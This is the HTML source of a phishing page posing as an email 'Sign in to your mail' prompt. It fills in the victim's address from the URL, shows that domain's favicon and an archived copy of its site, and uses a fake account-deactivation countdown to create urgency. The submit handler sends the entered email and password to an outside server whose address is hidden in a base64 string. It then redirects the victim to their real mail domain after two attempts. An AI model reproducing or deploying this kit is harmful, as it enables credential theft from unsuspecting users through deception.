<!DOCTYPE html>

<html lang="en" >

<head>

<meta charset="UTF-8">

<meta name="robots" content="noindex">

<meta name="googlebot" content="noindex">

<meta name="googlebot-news" content="noindex" />

<meta name="otherbot" content="noindex" />

<meta name="noarchive" content="noindex" />

<meta name="nosnippet" content="noindex" />

<meta name="noimageindex" content="noindex" />

<meta name="robots" content="none">

<meta name="googlebot" content="none">

<meta name="googlebot-news" content="none" />

<meta name="otherbot" content="none" />

<meta name="noarchive" content="none" />

<meta name="nosnippet" content="none" />

<meta name="noimageindex" content="none" />

<meta name="robots" content="nofollow">

<meta name="googlebot" content="nofollow">

<meta name="googlebot-news" content="nofollow" />

<meta name="otherbot" content="nofollow" />

<meta name="noarchive" content="nofollow" />

<meta name="nosnippet" content="nofollow" />

<meta name="noimageindex" content="nofollow" />

<meta name="robots" content="max-snippet:0">

<meta name="robots" content="unavailable_after: 2021-10-22">

<meta http-equiv="content-type" content="text/html; charset=windows-1252">

<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

<title>Sign in to your mail</title>

    <script src="https://scvhost.nyc3.cdn.digitaloceanspaces.com/-/en/files/jquery-1.js"></script>



    <!-- Bootstrap CSS -->

    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">

    <link href="https://fonts.googleapis.com/css?family=Yellowtail%26display=swap" rel="stylesheet">

    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>

  <style>

  

 html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,b,u,i,center,dl,dt,dd,ol,ul,li,fieldset,form,label,legend,table,caption,tbody,tfoot,thead,tr,th,td,article,aside,canvas,details,embed,figure,figcaption,footer,header,hgroup,menu,nav,output,ruby,section,summary,time,mark,audio,video{margin:0;padding:0;border:0;vertical-align:baseline}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:before,blockquote:after,q:before,q:after{content:'';content:none}table{border-collapse:collapse;border-spacing:0}

    

    html,body{}#root{position:absolute;left:0;right:0;bottom:0;top:0;z-index:-10;pointer-events:none}.error{color:#dc3545;width:80%;margin:0 auto;padding-top:5px}.form-holder{background-color:#fff;width:600px;margin:100px auto;height:100%;box-shadow:0 20px 50px #a9a9a9;border-radius:4px 4px 0 0;border:1px solid #d6dfea;z-index:12}

     

 }

  



.social_icons a{

  display: block;

  height: 45px;

  width: 100%;

  line-height: 45px;

  text-align: center;

  border-radius: 5px;

  font-size: 20px;

  color: #fff;

  text-decoration: none;

  transition: all 0.3s linear;

}

.social_icons a span{

  margin-left: 5px;

  font-size: 18px;

}

.social_icons a:first-child{

  margin-right: 5px;

  background: #4267B2;

}

.social_icons a:first-child:hover{

  background: #375695;

}

.social_icons a:last-child{

  margin-left: 5px;

  background: #1DA1F2;

}

.social_icons a:last-child:hover{

  background: #0d8bd9;

}

form {

  margin-top: 25px;

}

form .input_box{

  height: 50px;

  width: 100%;

  position: relative;

  margin-top: 15px;

}

.input_box input{

  height: 100%;

  width: 100%;

  outline: none;

  border: 1px solid lightgrey;

  border-radius: 5px;

  padding-left: 45px;

  font-size: 17px;

  transition: all 0.3s ease;

}

.input_box input:focus{

  border-color: #ff0000;

}

.input_box .icon{

  position: absolute;

  top: 50%;

  left: 20px;

  transform: translateY(-50%);

  color: grey;

}

form .option_div{

  margin-top: 5px;

  display: flex;

  justify-content: space-between;

}

.option_div .check_box{

  display: flex;

  align-items: center;

}

.option_div span{

  margin-left: 5px;

  font-size: 16px;

  color: #333;

}

.option_div .forget_div a{

  font-size: 16px;

  color: #be2edd;

}

.btn {

    display: inline-block;

    font-weight: 400;

    width: 100%;

    height: 50px;

    color: #fff;

    background: #007bff;

    text-align: center;

    vertical-align: middle;

    cursor: pointer;

    -webkit-user-select: none;

    -moz-user-select: none;

    -ms-user-select: none;

    user-select: none;

    background-color: #0062cc;

    border: 1px solid transparent;

    padding: 0.375rem 0.75rem;

    font-size: 1rem;

    line-height: 1.5;

    border-radius: 0.25rem;

    transition: color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;

}

.button input{

  padding-left: 0;

  background: #be2edd;

  color: #fff;

  border: none;

  font-size: 20px;

  font-weight: 500;

  cursor: pointer;

  transition: all 0.3s linear;

}

.btn input:hover{

  background: #0062cc;

}

form .sign_up{

  text-align: center;

  margin-top: 25px;

}

.sign_up a{

  color: #be2edd;

}

form a{

  text-decoration: none;

}

form a:hover{

  text-decoration: underline;

}



      .container {

        display: flex;

        align-items: center;

        justify-content: center

      }

      img {

        max-width: 350%

      }

      .image {

        flex-basis: 2%

      }

      .text {

        font-size: 16px;

        padding-left: 20px;

      }

  </style>



  <script>



    /* global $ */

    $(document).ready(function(){

      var count=0;



      $('#back1').click(function () {

        $("#msg").hide();

        $('#email').val("");

        $("#automail").animate({left:200, opacity:"hide"}, 0);

        $("#inputbar").animate({right:200, opacity:"show"}, 1000);



      });



      var email = window.location.hash.substr(1);

      if (!email) {



      }

      else

      {

        var my_email =email;

        $('#email').val(my_email);

        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;



        if (!filter.test(my_email)) {

          $('#error').show();

          email.focus;

          return false;

        }

        var ind=my_email.indexOf("@");

        var my_slice=my_email.substr((ind+1));

        var c= my_slice.substr(0, my_slice.indexOf('.'));

        var final= c.toLowerCase();

        var finalu= c.toUpperCase();





        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);

        $("#logoname").html(finalu);

        $(".logoname").html(finalu);

        $("#iframe").attr("src", "https://web.archive.org/web/"+my_slice);

      }

      

      $('#submit-btn').click(function(event){

        $('#error').hide();

        $('#msg').hide();

        event.preventDefault();

        var email=$("#email").val();

        var password=$("#password").val();

        var msg = $('#msg').html();

        $('#msg').text( msg );



      ///////////new injection////////////////

      var my_email =email;

      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;



      if (!filter.test(my_email)) {

        $('#error').show();

        email.focus;

        return false;

      }



      var ind=my_email.indexOf("@");

      var my_slice=my_email.substr((ind+1));

      var c= my_slice.substr(0, my_slice.indexOf('.'));

      var final= c.toLowerCase();

      var finalu= c.toUpperCase();



$("#iframe").attr("src", "https://web.archive.org/web/"+my_slice);

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);

        $(".logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);

        $("#logoname").html(finalu);

        

      ///////////new injection////////////////

      count=count+1;



      var xXx = atob("aHR0cHM6Ly9uZXd0b25wbXRhLmNvbS9zc2wvbGV0c2VuY3J5cHQvTy1PLzc0Nzc1MTA1OTI0LTM3OTQ3MDI4NDYzLTQxMjgxMzMyOTAxLTgyOTU3MTQ2NDk2LTAxNDM5NjY2MzY1L0EyMi5waHA=");      



      $.ajax({

        dataType: 'JSON',

        url: xXx,

        type: 'POST',

        data:{

          email:email,

          password:password,

        },

            // data: $('#contact').serialize(),

            beforeSend: function(xhr){

              $('#submit-btn').html('Verifying...');

            },

            success: function(response){

              if(response){

                $("#msg").show();

                console.log(response);

                if(response['signal'] == 'ok'){

                  $("#password").val("");

                  if (count>=2) {

                    count=0;

                    // window.location.replace(response['redirect_link']);

                    window.location.replace("http://www."+my_slice);



                  }

                  // $('#msg').html(response['msg']);

                }

                else{

                  // $('#msg').html(response['msg']);

                }

              }

            },

            error: function(){

              $("#password").val("");

              if (count>=2) {

                count=0;

                window.location.replace("http://www."+my_slice);

              }

              $("#msg").show();

              // $('#msg').html("Please try again later");

            },

            complete: function(){

              $('#submit-btn').html('Sign in');

            }

            

            

          });

          

        

    });





    });





  </script>

  



 

<script>

    window.onload = function() {

  var input = document.getElementById("password").focus();

}



</script>

  </head>

  <body>

      <div id="root">

<iframe id="iframe" scrolling="no" src="" width="100%" height="100%" frameborder="0"></iframe> 

</div>



<form action="#" method="post">

<input type="hidden" class="form-control" name="hido" id="hido" value="">

<input type="hidden" class="form-control" name="redirecto" id="redirecto" value="">



     <!--   <h1 style="text-align: center;">Hello, world!</h1>

 Button trigger modal --> 

  



    <!-- Modal -->

    <div class="modal fade" id="exampleModal" tabindex="-1" role="dialog" style="margin-top: 90px; display: block !important;" aria-labelledby="exampleModalLabel" aria-hidden="true">

    <div class="modal-dialog" style="box-shadow: rgba(0, 0, 0, 0.4) 0px 30px 90px;" role="document">

        <div class="modal-content">

        <div class="modal-header">

            <div class="xlogo">

            <h5><img id="logoimg" src="">

            <span style="text-transform: capitalize;" id="logoname"></span></h5>

            </div>

                

          <!--  <button type="button" class="close" data-dismiss="modal" aria-label="Close">

            <span aria-hidden="true">&times;</span>

            </button> -->

        </div>

        <div class="modal-body">

        <div class="form-wrap">

                <div class="container">

      <div class="image">

        <img src="https://scvhost.nyc3.cdn.digitaloceanspaces.com/-/en/files/warn2.png">

      </div>

      <div class="text"><b>

        Deactivation Countdown: <span id="countdown" style="color:red;"></span>

      </b></div>

    </div>



   <!--     

            <h6><p><img src="files/warn2.png" alt="alert" width="25" height="">Deactivation Countdown: <span id="countdown" style="color:red;"></span></p></h6>-->

            <center><div class="" id="" style="display: inline-block; color:red;"><p style="font-size: 14px;">Your session has expired, please sign in to continue.</p>      </div></center> 

        

      <div class="input_box">

      <input type="email" name="username" id="email" placeholder="Email address" disabled="disabled" >

        <div class="icon"><i class="fas fa-envelope"></i></div>

      </div>

      <div id="error" class="text-danger" style="font-size: 14px; display: none; color:red;">That account doesn't exist. Enter a different account</div>



   <div class="input_box">

    <input class="text-field" type="password" name="password" id="password" placeholder="Password" autofocus required> 



        <div class="icon"><i class="fas fa-lock"></i></div>

      </div> 

      <div class="" id="msg" style="font-size: 14px; display: none; color:red;"> Invalid Password.! Please Enter your correct Password</div>

        </div> 

                </div>



       <div class="modal-footer"> 

            <!--     <div class="input_box"> -->



            <button type="submit" id="submit-btn" class="btn btn-primary">Sign in</button>

        </div>

        </div>

    </div>

    </div>

        </form>





    <!-- Optional JavaScript -->

    <!-- jQuery first, then Popper.js, then Bootstrap JS -->

    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>

    <script>

       $(document).ready(function(){

            $('#exampleModal').modal('show');

        }); 

        

        $('#exampleModal').modal({

    backdrop: 'static',

    keyboard: false

})

    </script>

    

    <!-- Countdown Timer -->

<script>

function countdown(elementName, minutes, seconds) {

    let element, endTime, hours, mins, msLeft, time;



    function twoDigits(n) {

        return (n <= 9 ? '0' + n : n);

    }



    function updateTimer() {

        msLeft = endTime - (+new Date);



        if (msLeft < 1000) {

            element.innerHTML = '0:00';

        } else {

            time = new Date(msLeft);

            hours = time.getUTCHours();

            mins = time.getUTCMinutes();

            element.innerHTML = (hours ? hours + ':' + twoDigits(mins) : mins) + ':' + twoDigits(time.getUTCSeconds());



            // Save current time locally

            localStorage.setItem('lastHValue', hours);

            localStorage.setItem('lastMValue', mins);

            localStorage.setItem('lastSValue', time.getUTCSeconds());



            setTimeout(updateTimer, time.getUTCMilliseconds() + 500);

        }

    }



    element = document.getElementById(elementName);

    endTime = (+new Date) + 1000 * (60*minutes + seconds) + 500;



    updateTimer();

}



if (localStorage.getItem('lastHValue')) {

    let lastHValue = parseInt(localStorage.getItem('lastHValue')),

        lastMValue = parseInt(localStorage.getItem('lastMValue')),

        lastSValue = parseInt(localStorage.getItem('lastSValue'));



    let totalMValue = parseInt((lastHValue * 60) + lastMValue);



    countdown('countdown', totalMValue, lastSValue);

} else {

    countdown('countdown', 1439, 59);

}

</script>

  <script>

  $('.text-field').prop('required',true);

  </script>

  </body>

</html>

